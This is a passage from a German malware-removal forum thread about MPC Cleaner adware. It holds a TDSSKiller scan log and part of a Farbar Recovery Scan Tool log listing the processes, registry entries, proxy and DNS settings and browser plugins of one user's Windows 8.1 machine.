0B8FACF3382443DED79A8004A6AA14C32471A6A1C6BAA543AA9F3FEC52620A6D ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys 12:54:53.0774 0x1004 NetBIOS - ok 12:54:53.0821 0x1004 [ 0217532E19A748F0E5D569307363D5FD, C40C2E7AFA276057E7327A7BB173122689D6CEC9AE443C3850C3F94AF03DFBF5 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys 12:54:53.0868 0x1004 NetBT - ok 12:54:53.0883 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] Netlogon C:\WINDOWS\system32\lsass.exe 12:54:53.0899 0x1004 Netlogon - ok 12:54:53.0946 0x1004 [ 8F074B62E66B6117D9598C62A12069C5, 5FDB19045D3E2F6D0F0C5158AC2ECB0D5404CD2AF7A319755D7E3753CA3B7CF3 ] Netman C:\WINDOWS\System32\netman.dll 12:54:53.0977 0x1004 Netman - ok 12:54:54.0040 0x1004 [ 4A04B1CD5BFB4A978C5F60E86D6C3E45, 
A946922C1C38ADD3CF9D3B09DDCC301AE4DAC960A081B2F42B32BE1E7095B3FD ] netprofm C:\WINDOWS\System32\netprofmsvc.dll 12:54:54.0071 0x1004 netprofm - ok 12:54:54.0102 0x1004 [ 1092B3190E69E0C5ECBCE90F171DE047, C16106EEFC324EE80E5F659CB71A5DD69FA800D36D829F5B0E6AD3393BD1BAF7 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 12:54:54.0118 0x1004 NetTcpPortSharing - ok 12:54:54.0165 0x1004 [ D4DCE03870314D3354F3501F9DDD4123, 5BFE8299B3F72B8C39A4965365CBF5BA151024451F02DD872FAD1CC35CF94CEA ] netvsc C:\WINDOWS\System32\drivers\netvsc63.sys 12:54:54.0227 0x1004 netvsc - ok 12:54:54.0274 0x1004 [ E94EB2A95D7D016E119C4D6868788831, 3E4A925D23262FBA0A6432DD635FBE94B0CEF76BD9BB323254B66977497FEE2A ] NlaSvc C:\WINDOWS\System32\nlasvc.dll 12:54:54.0321 0x1004 NlaSvc - ok 12:54:54.0337 0x1004 [ 8F44A2F57C9F1A19AC9C6288C10FB351, 310274DDBAC0FE4BE54ECD3B90C97D82A0F9F5CFCA7A35711A36164DE4B94074 ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys 12:54:54.0602 0x1004 Npfs - ok 12:54:54.0649 0x1004 [ CBDB4F0871C88DF930FC0E8588CA67FC, 7E4AA3EA81A9D532F236FD7896744F07ED07CA9B37A9F18A9778BCCCC67490F2 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys 12:54:54.0696 0x1004 npsvctrig - ok 12:54:54.0712 0x1004 [ 0F12A72A753CFD7FB0631EE8D08FE983, 860A96471F6CD90DDA9AB3A48E95CEAD826C87D2FA98A00EF91B61C44A4C8B82 ] nsi C:\WINDOWS\system32\nsisvc.dll 12:54:54.0758 0x1004 nsi - ok 12:54:54.0790 0x1004 [ 0E046FF5823B95326D10CF1B4AF23541, 39D22715003746527AB4BFEDED8C34B695DAF589091AE7F3A2A2C4B8A35675A9 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys 12:54:54.0821 0x1004 nsiproxy - ok 12:54:54.0977 0x1004 [ 7F68063A5A0461E02BC860CE0E6BFDDC, 47E9F75D27B97278B74034B7D3951A26B1644911ED321455E08D935731C858DE ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys 12:54:55.0071 0x1004 Ntfs - ok 12:54:55.0118 0x1004 [ EF1B290FC9F0E47CC0B537292BEE5904, DBC07BBC54EBC2D2E576B23A4CE116B3DA988577AD0D96CB7289A6748A60F9EA ] Null C:\WINDOWS\system32\drivers\Null.sys 12:54:55.0133 0x1004 Null - ok 
12:54:55.0165 0x1004 [ BC6B5942AFF25EBAF62DE43C3807EDF8, CB0FA194084B8C309039D571B5760FDA800E9531B8660C499B4F9977BA5C36D5 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys 12:54:55.0165 0x1004 nvraid - ok 12:54:55.0180 0x1004 [ 1F43ABFFAC3D6CA356851D517392966E, 6FD7621F67BA94B0E1D8F43BEC2951DBCDEEA1E848BB265AC169E27C01DA68F2 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys 12:54:55.0212 0x1004 nvstor - ok 12:54:55.0227 0x1004 [ 6934A936A7369DFE37B7DBA93F5E5E49, 0900FEEB0CE8D09F0FC60630B5B986034A8BCD3882ED66E47170810C32492892 ] nv_agp C:\WINDOWS\system32\drivers\nv_agp.sys 12:54:55.0243 0x1004 nv_agp - ok 12:54:55.0290 0x1004 [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE 12:54:55.0305 0x1004 ose - ok 12:54:55.0508 0x1004 [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 12:54:55.0680 0x1004 osppsvc - ok 12:54:55.0743 0x1004 [ 26657F3B4F39A0E64AF859278B599C4E, 3DD65E0BCEF3045DBA29FB8171CA3FCC9781AED3A1C7A160CF26388CE80A3683 ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll 12:54:55.0774 0x1004 p2pimsvc - ok 12:54:55.0805 0x1004 [ FD8F61F0D1F64BBB3D835F39A3F979C9, E5C5F86576488EA7F605E26C06EE5AFB36506A446F60C894D55E0A148BF7F02D ] p2psvc C:\WINDOWS\system32\p2psvc.dll 12:54:55.0852 0x1004 p2psvc - ok 12:54:55.0868 0x1004 [ 764B1121867B2D9B31C491668AC72B2B, 32C04B6FCE1DDD09697B81473A23BDCED8BEEFBCD0D2D58DDC9A11A33C756967 ] Parport C:\WINDOWS\System32\drivers\parport.sys 12:54:55.0883 0x1004 Parport - ok 12:54:55.0915 0x1004 [ BAFF6122CFC9F95CA175AD8C348179A4, 079A912D951DF6A57BC1BDB0D182977EE9592751EC9DDCDA2932BDEDB333850C ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys 12:54:55.0930 0x1004 partmgr - ok 12:54:55.0993 0x1004 [ ABE95ABE27A8BD9701782BBCD82C9925, 
- ok 12:55:11.0900 0x1004 WSearch - ok 12:55:12.0072 0x1004 [ 6B2D71124C1EA86B74412F414C42431D, 078CC6C9667EF6BDA3E6900BC26A5A5B030CAA66928A6BBB7B7DC43C5C199EDC ] WSService C:\WINDOWS\System32\WSService.dll 12:55:12.0228 0x1004 WSService - ok 12:55:12.0369 0x1004 [ 020F47C655ED1F63BBA834AA53575D5C, 7E36BB83B937CEA8B5D1EAF1DF63D32D64CA8045DA377DF5237D2F4DC16574CC ] wuauserv C:\WINDOWS\system32\wuaueng.dll 12:55:12.0556 0x1004 wuauserv - ok 12:55:12.0603 0x1004 [ 481286719402E4BAEFEA0604AB1B5113, F3CF65DF2AB39F79AE4C1335831408418E40726706E0242677E8B96B0FAD988F ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys 12:55:12.0697 0x1004 WudfPf - ok 12:55:12.0712 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys 12:55:12.0744 0x1004 WUDFRd - ok 12:55:12.0759 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFSensorLP C:\WINDOWS\System32\drivers\WUDFRd.sys 12:55:12.0775 0x1004 WUDFSensorLP - ok 12:55:12.0806 0x1004 [ 51D28F7F1F888DDCF2C67DCF3B79A5D3, 74FF2936AFCEB9A36175D5B00EB91A5AD614B52BE3FB3FA9B994A025A484D2B7 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll 12:55:12.0837 0x1004 wudfsvc - ok 12:55:12.0837 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFWpdFs C:\WINDOWS\System32\drivers\WUDFRd.sys 12:55:12.0853 0x1004 WUDFWpdFs - ok 12:55:12.0869 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFWpdMtp C:\WINDOWS\System32\drivers\WUDFRd.sys 12:55:12.0884 0x1004 WUDFWpdMtp - ok 12:55:12.0916 0x1004 [ A0900F8F628B5AF6841414EB3CF11E50, 8A531F2472FF4B4D895D469D28C215C834ECADBEF539894B8F3F606079A86184 ] WwanSvc C:\WINDOWS\System32\wwansvc.dll 12:55:12.0947 0x1004 WwanSvc - ok 12:55:12.0962 0x1004 ================ Scan global =============================== 12:55:13.0009 0x1004 [ 
05B08C20B8428ECE088CB5635696A48D, 471642A2D0E5C3BB235962FC8D86A49AC30D7DDE80B97E348425BBFCDE4DCDC3 ] C:\WINDOWS\system32\basesrv.dll 12:55:13.0056 0x1004 [ EAB311B0A7A8EA0346F14F08D4BC8F46, 11168E4074679F8A69DA714C0ABD0C68BA49D171B379343F14783C9C563202CA ] C:\WINDOWS\system32\winsrv.dll 12:55:13.0087 0x1004 [ 3600ED7EA8AED849E20700551C0BD63B, 4A8C346C1646E80B58EF93F87F915A41E05CA2E993BB1C96955AE62A0669AF66 ] C:\WINDOWS\system32\sxssrv.dll 12:55:13.0119 0x1004 [ E0C7813A97CA7947FF5C18A8F3B61A45, 083BB4F3B20419C87DB656F1465E5F782ACDE76838CDE6207F26AAD035C69DE0 ] C:\WINDOWS\system32\services.exe 12:55:13.0134 0x1004 [ Global ] - ok 12:55:13.0134 0x1004 ================ Scan MBR ================================== 12:55:13.0134 0x1004 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0 12:55:13.0212 0x1004 \Device\Harddisk0\DR0 - ok 12:55:13.0212 0x1004 ================ Scan VBR ================================== 12:55:13.0244 0x1004 [ C4324B2D23C8414CCC18BEBA48FD9C22 ] \Device\Harddisk0\DR0\Partition1 12:55:13.0275 0x1004 \Device\Harddisk0\DR0\Partition1 - ok 12:55:13.0275 0x1004 [ 64F3D15DBF257043A337B56F52EB68E7 ] \Device\Harddisk0\DR0\Partition2 12:55:13.0291 0x1004 \Device\Harddisk0\DR0\Partition2 - ok 12:55:13.0306 0x1004 [ B1E27AA018409DE6BFD73F8AFB883A65 ] \Device\Harddisk0\DR0\Partition3 12:55:13.0306 0x1004 \Device\Harddisk0\DR0\Partition3 - ok 12:55:13.0322 0x1004 [ 67412939B997C98E2CB5A53654AA1CE1 ] \Device\Harddisk0\DR0\Partition4 12:55:13.0337 0x1004 \Device\Harddisk0\DR0\Partition4 - ok 12:55:13.0369 0x1004 [ 3A8719D39E4BDB228D6A98CD821E38E7 ] \Device\Harddisk0\DR0\Partition5 12:55:13.0384 0x1004 \Device\Harddisk0\DR0\Partition5 - ok 12:55:13.0400 0x1004 [ 2EE8017EB06567247739F064A4387423 ] \Device\Harddisk0\DR0\Partition6 12:55:13.0400 0x1004 \Device\Harddisk0\DR0\Partition6 - ok 12:55:13.0400 0x1004 ================ Scan generic autorun ====================== 12:55:13.0822 0x1004 [ 6EEAF19A5D61F8CA23F233D9D3D7CE0F, 
421730288CF409AC650ADB70A1A8B619BE4640E45DC56C7355B64D97BD425218 ] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe 12:55:14.0213 0x1004 RtHDVCpl - ok 12:55:14.0275 0x1004 [ 45D629AAF007A0DED6689A7A031D2AC7, DD10DEA927A2CC16EE38765DD1DE45E88288C09923DC14A95C1C6E457D535BCC ] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe 12:55:14.0322 0x1004 RtHDVBg_Dolby - ok 12:55:14.0338 0x1004 [ 7C92202C43FF457EF2CEE7301973E3BA, DD89F47243DC84CBCDA6624A1CCEC22822EA4F3B8B75260D062713AB22A03FF4 ] C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe 12:55:14.0369 0x1004 Samsung Link - ok 12:55:14.0416 0x1004 AdobeAAMUpdater-1.0 - ok 12:55:14.0463 0x1004 [ 901AA7A38CE13F14B6BBEC38C0595698, 1E95F2048E2A1782807D52E9816ED267355718E24D01FF07ACE73D965EDE388A ] C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe 12:55:14.0478 0x1004 BCSSync - ok 12:55:14.0541 0x1004 [ 3B104EE76B142ECDFCD38ED80F0098A5, EFDB2B48255A2928B13BE922CD40FD18A12102A397036DDF2BE9C2160359695E ] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe 12:55:14.0588 0x1004 Nikon Message Center 2 - detected UnsignedFile.Multi.Generic ( 1 ) 12:55:17.0041 0x1004 Detect skipped due to KSN trusted 12:55:17.0041 0x1004 Nikon Message Center 2 - ok 12:55:17.0197 0x1004 [ 5DCCD49BF96D2B87F04ECB1671B85A4C, 16739D879B344542014FC5E1AFEAFD4FE0CD24CF8D891037C20D47F543D0B37A ] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe 12:55:17.0291 0x1004 Adobe Creative Cloud - ok 12:55:17.0291 0x1004 SunJavaUpdateSched - ok 12:55:17.0572 0x1004 [ 1CE11C53E562D5F7EAFCF47E0E696516, 4E8264DB3CA9B2344905BC2CAE6A9E73190A3CCF3D154B3CBDAF4F73F8FCD64B ] C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe 12:55:17.0603 0x1004 avgnt - ok 12:55:17.0603 0x1004 Web Companion - ok 12:55:17.0650 0x1004 [ 7AFF1C22E8BC6D8181053FC3590FD0F2, 7AD0BF719597CD4770A45E16C4F45F233F99D473AA1F4F0B0FC0F8D26976F883 ] C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE 12:55:17.0681 0x1004 OfficeSyncProcess - 
ok 12:55:17.0681 0x1004 Waiting for KSN requests completion. In queue: 155 12:55:18.0697 0x1004 Waiting for KSN requests completion. In queue: 155 12:55:19.0713 0x1004 Waiting for KSN requests completion. In queue: 155 12:55:20.0728 0x1004 AV detected via SS2: Avira Antivirus, C:\Program Files (x86)\Avira\AntiVir Desktop\wsctool.exe ( 15.0.16.273 ), 0x41000 ( enabled : updated ) 12:55:20.0728 0x1004 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.8.207.0 ), 0x60100 ( disabled : updated ) 12:55:20.0744 0x1004 Win FW state via NFP2: enabled ( trusted ) 12:55:23.0119 0x1004 ============================================================ 12:55:23.0119 0x1004 Scan finished 12:55:23.0119 0x1004 ============================================================ 12:55:23.0119 0x0278 Detected object count: 0 12:55:23.0119 0x0278 Actual detected object count: 0 |
29.03.2016, 12:12 | #4 |
| MPC Cleaner cannot be removed (malware) Here is the second part: FRST - Editor Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Denny (Administrator) auf SCHNEIDER (29-03-2016 13:01:45)
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator)
Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [sun13] => [X]
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications)
HKLM\...\Policies\Explorer: [CDRAutoRun] 1
HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => http=127.0.0.1:51218;https=127.0.0.1:51218
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149
Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70
Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70

Internet Explorer:
==================
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF Homepage: hxxp://www.google.de/
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19]
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
